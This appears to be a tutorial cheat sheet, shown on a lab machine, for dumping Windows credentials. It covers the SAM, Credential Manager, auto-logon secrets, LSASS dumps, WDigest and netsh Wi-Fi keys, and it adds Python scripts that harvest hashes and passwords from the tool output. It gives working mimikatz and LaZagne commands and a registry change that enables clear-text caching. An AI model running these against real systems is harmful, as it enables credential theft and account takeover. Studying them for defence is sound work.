Introduction
The way Windows stores passwords has been an area of interest for security researchers since the earliest versions of the operating system, and its implementation has often been criticised. Newer versions of Windows have addressed many of the weaknesses, but Windows' password storage still cannot be called one of the best designs available. In this article, the first of a three-part series, we look at the various ways of dumping the passwords of default Windows applications and components when the system is part of a local workgroup. Later parts of the series cover domain-joined machines and Active Directory. The purpose of this article is to serve as a quick reference (a cheat sheet) for the dumping techniques; links to detailed articles covering each option in depth are given for further reading. Before beginning, note that many other tools are available, but only the traditional ones are covered here. Here is what you will find in the article:
Table of Contents:
1. Dumping Windows logon passwords from SAM file
2. Dumping Windows network, RDP and browser passwords from Windows Credential Manager
3. Dumping Windows auto login passwords
4. Dumping Windows passwords from LSASS process (by creating an LSA dump)
5. Dumping Windows passwords using WDigest protocol
6. Dumping Windows Wi-Fi passwords using netsh
Dumping Windows logon passwords from SAM file
SAM file – The Security Account Manager (SAM) is a database present in Windows XP and later that stores the local user accounts and their password hashes. It is used to authenticate local and remote users. Passwords are never stored in clear: each account carries an LM hash and/or an NT (NTLM) hash inside a registry hive backed by the file %SystemRoot%\System32\config\SAM. LM hash storage is disabled by default from Windows Vista onward because the LM scheme (DES applied to the two 7-character halves of an upper-cased password) is trivially broken; on such systems the LM field shows the well-known empty value aad3b435b51404eeaad3b435b51404ee. The SAM file cannot be copied or moved while Windows is running, because the kernel holds an exclusive lock on it until shutdown. The same data can however be read through the live registry (the SAM and SYSTEM hives) or from a volume shadow copy, and in-memory copies can be dumped using various techniques which are covered in detail in the article here.
We'll be using mimikatz to dump the SAM. You can download mimikatz here. Run it as administrator and then enter the following commands (privilege::debug requests SeDebugPrivilege, token::elevate impersonates the SYSTEM token, which is required to read the SAM and SYSTEM hives, and lsadump::sam decrypts and prints the hash of every local account):
privilege::debug
token::elevate
lsadump::sam
We'll see that the hashes of the local accounts are dumped, among them those of our own user. In this case, my user is raj and the Windows password is 123. We have obtained an NT hash, which can be cracked offline with tools like john or hashcat (hashcat mode 1000). Heading over to crackstation.net's online NTLM cracker, we successfully crack the hash we just obtained.
It should be noted that even the hashes are not stored as-is. Inside the SAM hive each hash is encrypted twice: first with DES using keys derived from the account's RID, and then with a key derived from the boot key (SYSKEY), which is itself spread across the SYSTEM registry hive. This is why both hives are needed to recover the hashes.
Up to Windows 7 the second encryption layer used RC4, an obsolete algorithm, and dumping tools had long supported that layout. Since Windows 10 Anniversary Update (version 1607), Microsoft encrypts the hashes with AES-128 instead, which broke many older dumping tools until they were updated; mimikatz was updated as well. Note that what comes out of the SAM is always a hash, never a clear-text password: clear-text recovery depends on LSASS caching credentials in a reversible form (see the WDigest section below), so on a patched Windows 10 machine mimikatz will often be able to show only hashes rather than passwords.
Dumping Windows network, RDP and browser passwords from Windows Credential Manager
Windows Credential Manager is the store where Windows and Edge (web) credentials are kept: network share, OneDrive, RDP and website logons saved by the user all end up here. What's more, the stored passwords do not need to be cracked: they are encrypted with DPAPI under the owning user's key, so any process running as that user (or as SYSTEM) can decrypt them. You can check out the full article with other tools and methods here, but we'll stick to mimikatz. You can open Credential Manager from Control Panel → User Accounts → Credential Manager. Below you can see that Facebook credentials saved as a web credential on my system are visible.
Similarly, stored Windows logon credentials would be visible like this:
We can dump these credentials from LSASS memory with the help of the mimikatz commands:
privilege::debug
sekurlsa::credman
And just like that we see that the user "harshit" has the password "1234".
Similarly, we can use LaZagne, another handy tool that you can download from here. To run LaZagne against every credential store it supports, type:
lazagne.exe all
A machine might also have RDP passwords saved, as in the following screenshot. To dump the saved RDP passwords we'd use NirSoft's Network Password Recovery, which can be downloaded here.
And just like that, we have dumped the RDP password as well.
Dumping Windows auto login passwords
Windows has an automatic logon feature that lets a machine boot straight into a user account without prompting for a password. While this feature is handy, the setback is that the password has to be stored somewhere on disk and can therefore be dumped as well. Let's first set up auto login in Windows and then try to dump it. To reach the dialog that configures it, type the following in the Run prompt:
control userpasswords2
We'll see the following window upon running the command. To enable an account to auto login, simply uncheck the first option, "Users must enter a user name and password to use this computer", which is checked by default. When we click Apply, a prompt asks for the account's password once more. After filling it in we restart to make sure the auto login is now applied.
Now, to dump the auto login password, we'll use a small application developed by NirSoft called Network Password Recovery, which can be downloaded from here. Just run the application and we're good to go.
Note that it has only dumped the credential of the current user, because only one account can be auto logged in at a time. When configured through this dialog the password is stored as the LSA secret DefaultPassword, which mimikatz can also read with lsadump::secrets; when auto logon is instead configured by hand in the registry (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, value DefaultPassword) the password sits there in clear text.
Dumping Windows passwords from LSASS process
LSASS process: The Local Security Authority Subsystem Service is a process in Microsoft Windows that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. It also writes to the Windows Security log.
When a user attempts to log on locally by entering a username and password in the logon dialog, the logon process invokes the LSA, which passes the user's credentials to the Security Accounts Manager (SAM), which manages the account information stored in the local SAM database.
The SAM compares the user's credentials with the account information in the SAM database to determine whether the user is authorized to access the system. If it finds the account, the SAM authenticates the user by creating a logon session and returning the security identifier (SID) of the user and the SIDs of the global groups of which the user is a member to the LSA.
The LSA then grants the user an access token that contains the user's individual and group SIDs and their rights; these enable the user to access the resources for which he or she has permissions.
What's interesting is that the memory of the LSASS process holds the credential material of every active logon session, so a dump of that process lets us retrieve hashes (and, depending on the authentication packages enabled, clear-text passwords) for the current sessions. To demonstrate this we'll first learn how to create an LSASS dump manually.
Go to Task Manager (run as administrator), find the lsass.exe process (it is listed as "Local Security Authority Process" on the Processes tab and as lsass.exe on the Details tab), right-click it and choose "Create dump file".
Store this dump file in any location. By default Task Manager writes it to the Temp directory; before running the commands we copied it to C:\Users\raj\Desktop\lsass.DMP. Because the dump is a plain file it can also be copied off the machine and parsed elsewhere, which is why defenders watch for processes opening handles to lsass.exe. Now, we'll fire up mimikatz and type in the following commands:
privilege::debug
sekurlsa::minidump C:\Users\raj\Desktop\lsass.DMP
sekurlsa::logonpasswords
And sure enough we see the NT hash of the logged-on user dumped from the LSASS dump file.
Another method of dumping hashes from the LSA is the patch method, which patches the running LSASS process so that mimikatz can read the stored hashes directly instead of going through a dump file. To perform it, type in the following commands:
privilege::debug
lsadump::lsa /patch
This hash is the same as the one obtained in method 1. Hence, the password is 123.
Note that there are more methods of recovering passwords from LSASS. You can follow the article here for numerous other ways.
Dumping Windows passwords using WDigest protocol
WDigest: Digest authentication is a challenge/response protocol, introduced with Windows XP and Windows Server 2003, that is used for LDAP and web-based (HTTP) authentication, carried either in HTTP headers or in a SASL exchange. The exchange works as follows:
Client → (requests access) → Authentication Server
Authentication Server → (challenge, a nonce) → Client
Client → (response: hash of the nonce together with a key derived from the password) → Authentication Server
Authentication Server → (computes the expected response and compares) → determines whether the client has the correct password
For the server side to compute the expected response it needs the password itself (or a reversible form of it), so when WDigest is enabled LSASS keeps the clear-text password of every logged-on user in memory. That cached copy is exactly what mimikatz reads.
To dump passwords using this method, fire up mimikatz as administrator and type in the following commands:
privilege::debug
sekurlsa::wdigest
It should be noted that WDigest credential caching was enabled by default on Windows 7 and Windows Server 2008 R2 (Microsoft later disabled it there through update KB2871997) and is disabled by default from Windows 8.1 / Server 2012 R2 onward, including Windows 10, but the provider itself is not removed. So, to perform this practical on a Windows 10 machine we first have to enable WDigest. We can do so by either of two methods:
Command line method:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
gpupdate /force
Manual method:
To do this, traverse to the following path in the Registry Editor:
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
Then right click → New → DWORD (32-bit) Value → name it UseLogonCredential.
Then modify the value and set it to 1.
After this, update group policy:
gpupdate /force
Restart your PC now. LSASS reads UseLogonCredential when a logon occurs, so clear-text passwords are only cached for sessions created after the change; the restart (or at least a logoff and logon) is what actually makes the difference. Defenders should keep this value at 0 (or absent on modern builds) and alert on changes to it, since setting it to 1 is a common attacker action.
After a successful restart, running mimikatz with the following commands gives a different result: the Password field under wdigest, which showed (null) before, now contains the clear-text password.
privilege::debug
sekurlsa::wdigest
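When sekurlsa::logonpasswords or sekurlsa::wdigest is run against many sessions (or against a dump file taken from another machine, as in the LSASS section above), the output is long and easier to triage programmatically. The Python below is an added example, not part of the original article or of mimikatz: it parses text in the layout mimikatz prints into one record per logon session and pulls out the NT hashes and any provider that holds a real clear-text password. The sample text is constructed: one session captured while UseLogonCredential was 0 (wdigest shows (null)) and one fresh logon after it was set to 1 (wdigest shows the password). Names, SID and logon IDs are made up; the NTLM value is the real NT hash of "123".

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout of mimikatz sekurlsa::logonpasswords.
SAMPLE_LOGONPASSWORDS = """\
Authentication Id : 0 ; 210203 (00000000:0003351b)
Session           : Interactive from 1
User Name         : raj
Domain            : DESKTOP-LAB
SID               : S-1-5-21-1111111111-2222222222-3333333333-1001
        msv :
         [00000003] Primary
         * Username   : raj
         * Domain     : DESKTOP-LAB
         * NTLM       : 3dbde697d71690a769204beb12283678
        tspkg :
        wdigest :
         * Username   : raj
         * Domain     : DESKTOP-LAB
         * Password   : (null)
        kerberos :
         * Username   : raj
         * Domain     : DESKTOP-LAB
         * Password   : (null)

Authentication Id : 0 ; 1569432 (00000000:0017f298)
Session           : Interactive from 2
User Name         : raj
Domain            : DESKTOP-LAB
SID               : S-1-5-21-1111111111-2222222222-3333333333-1001
        msv :
         [00000003] Primary
         * Username   : raj
         * Domain     : DESKTOP-LAB
         * NTLM       : 3dbde697d71690a769204beb12283678
        wdigest :
         * Username   : raj
         * Domain     : DESKTOP-LAB
         * Password   : 123
        kerberos :
         * Username   : raj
         * Domain     : DESKTOP-LAB
         * Password   : (null)
"""

_SESSION_RE = re.compile(r"^Authentication Id\s*:\s*(.+?)\s*$")
_TOPLEVEL_RE = re.compile(r"^(User Name|Domain|SID|Session)\s*:\s*(.*?)\s*$")
_PROVIDER_RE = re.compile(r"^\s+(\w+)\s*:\s*$")          # "        msv :"
_FIELD_RE = re.compile(r"^\s+\*\s*(\w+)\s*:\s*(.*?)\s*$")  # "         * NTLM : ..."


def parse_logonpasswords(text: str) -> List[Dict]:
    """One dict per logon session; provider fields nested under 'providers'."""
    sessions, cur, provider = [], None, None
    for line in text.splitlines():
        m = _SESSION_RE.match(line)
        if m:  # a new session block starts
            cur = {"auth_id": m.group(1), "providers": {}}
            sessions.append(cur)
            provider = None
            continue
        if cur is None:
            continue
        m = _TOPLEVEL_RE.match(line)
        if m:
            cur[m.group(1)] = m.group(2)
            continue
        m = _PROVIDER_RE.match(line)
        if m:
            provider = m.group(1).lower()
            cur["providers"].setdefault(provider, {})
            continue
        m = _FIELD_RE.match(line)
        if m and provider:
            cur["providers"][provider][m.group(1).lower()] = m.group(2)
    return sessions


def cleartext_credentials(sessions: List[Dict]) -> List[Tuple[str, str, str]]:
    """(user, provider, password) for every provider holding a real password."""
    found = []
    for s in sessions:
        for name, fields in s["providers"].items():
            pw = fields.get("password")
            if pw and pw != "(null)":
                found.append((fields.get("username", s.get("User Name", "")), name, pw))
    return found


def nt_hashes(sessions: List[Dict]) -> Dict[str, str]:
    """Map auth_id -> NT hash from the msv provider (hashes survive with WDigest off)."""
    return {s["auth_id"]: s["providers"].get("msv", {}).get("ntlm")
            for s in sessions if "msv" in s["providers"]}


if __name__ == "__main__":
    sessions = parse_logonpasswords(SAMPLE_LOGONPASSWORDS)
    print("NT hashes :", nt_hashes(sessions))
    print("clear text:", cleartext_credentials(sessions))
```

The contrast the two sessions show is the whole point of the WDigest section: the NT hash is present in both, but only the logon made after UseLogonCredential was set yields a clear-text password.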
Dumping Windows Wi-Fi passwords using netsh
All the wireless profiles, each with its SSID and key, are stored as XML files in the location:
C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***
The key inside those XML files is DPAPI-protected, so the file alone does not reveal the passphrase; netsh decrypts it for us.
netsh: a command-line scripting utility that lets you display or modify the network configuration of the computer it runs on. Netsh commands can be typed at the netsh prompt or used in batch files and scripts.
To get the list of the SSIDs the device has connected to, use the following command:
netsh wlan show profiles
As a result of the above command you can see the names of the Wi-Fi networks the system was connected to in the past or present, such as Meterpreter, Linuxlab, etc., as demonstrated in the image above.
Further, to reveal the password of any one of the listed SSIDs, use the following command (quote the name if it contains spaces; showing the key for an all-user profile normally requires an elevated prompt):
netsh wlan show profile name=<SSID Name> key=clear
As shown in the image above, the password appears in the output as the Key Content field under Security settings.
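Collecting the keys of every profile by hand gets tedious on a machine with many saved networks, so here is an added Python example (not part of the original article) that parses the two netsh outputs described above and the on-disk profile XML. It lists the profile names from "netsh wlan show profiles", extracts Key Content from "netsh wlan show profile ... key=clear", and reads the profile XML to show that the stored keyMaterial is a protected (DPAPI) blob rather than the passphrase. All three sample texts are constructed in the layout Windows produces; the interface name, passphrase and keyMaterial bytes are made up.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed: layout of "netsh wlan show profiles" (SSIDs from the article).
SAMPLE_PROFILES = """\
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Meterpreter
    All User Profile     : Linuxlab
"""

# Constructed: layout of "netsh wlan show profile name=Meterpreter key=clear"
# run from an elevated prompt; the passphrase is made up.
SAMPLE_PROFILE_CLEAR = """\
Profile Meterpreter on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : Meterpreter

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Meterpreter!2020
"""

# Constructed: shape of a profile XML under ProgramData\Microsoft\Wlansvc;
# a real keyMaterial is a long DPAPI blob, shortened here.
SAMPLE_PROFILE_XML = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Meterpreter</name>
  <SSIDConfig><SSID><name>Meterpreter</name></SSID></SSIDConfig>
  <MSM><security>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>true</protected>
      <keyMaterial>01000000D08C9DDF0115D1118C7A00C04FC297EB</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>
"""

_PROFILE_LINE = re.compile(r"^\s*(?:All User|Current User) Profile\s*:\s*(.+?)\s*$")
_KV_LINE = re.compile(r"^\s{4}(\S[^:]*?)\s*:\s*(.*?)\s*$")  # indented "key : value"
_NS = {"p": "http://www.microsoft.com/networking/WLAN/profile/v1"}


def parse_profile_names(text: str) -> List[str]:
    """SSIDs listed by 'netsh wlan show profiles'."""
    return [m.group(1) for m in map(_PROFILE_LINE.match, text.splitlines()) if m]


def parse_profile_detail(text: str) -> Dict[str, str]:
    """Flatten the indented 'key : value' lines; first occurrence wins because
    netsh repeats Authentication/Cipher for each supported combination."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = _KV_LINE.match(line)
        if m and m.group(1) not in fields:
            fields[m.group(1)] = m.group(2)
    return fields


def harvest(profiles_text: str, detail_texts: Dict[str, str]) -> Dict[str, Optional[str]]:
    """SSID -> passphrase; None when the key=clear output had no Key Content
    (not elevated, or an open network)."""
    return {ssid: parse_profile_detail(detail_texts.get(ssid, "")).get("Key Content")
            for ssid in parse_profile_names(profiles_text)}


def parse_profile_xml(xml_text: str) -> Dict[str, Optional[object]]:
    """Read the stored key: only unprotected profiles carry the passphrase itself."""
    root = ET.fromstring(xml_text)
    protected = root.findtext("p:MSM/p:security/p:sharedKey/p:protected", namespaces=_NS)
    material = root.findtext("p:MSM/p:security/p:sharedKey/p:keyMaterial", namespaces=_NS)
    return {"ssid": root.findtext("p:SSIDConfig/p:SSID/p:name", namespaces=_NS),
            "protected": protected == "true",
            "key_material": material,
            "plaintext_key": material if protected == "false" else None}


if __name__ == "__main__":
    print(harvest(SAMPLE_PROFILES, {"Meterpreter": SAMPLE_PROFILE_CLEAR}))
    print(parse_profile_xml(SAMPLE_PROFILE_XML))
```

On a live machine the detail texts would come from running netsh once per name returned by parse_profile_names; the XML parser is what you reach for when you only have the files (for example from a disk image), where it tells you immediately that the passphrase must still be decrypted with the machine's DPAPI keys.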
Conclusion
In this article we demonstrated credential dumping from the various default files, registry hives and processes in Windows that store the passwords of many services when the system is part of a local workgroup. The next article will demonstrate dumping passwords from a domain. Thanks for reading.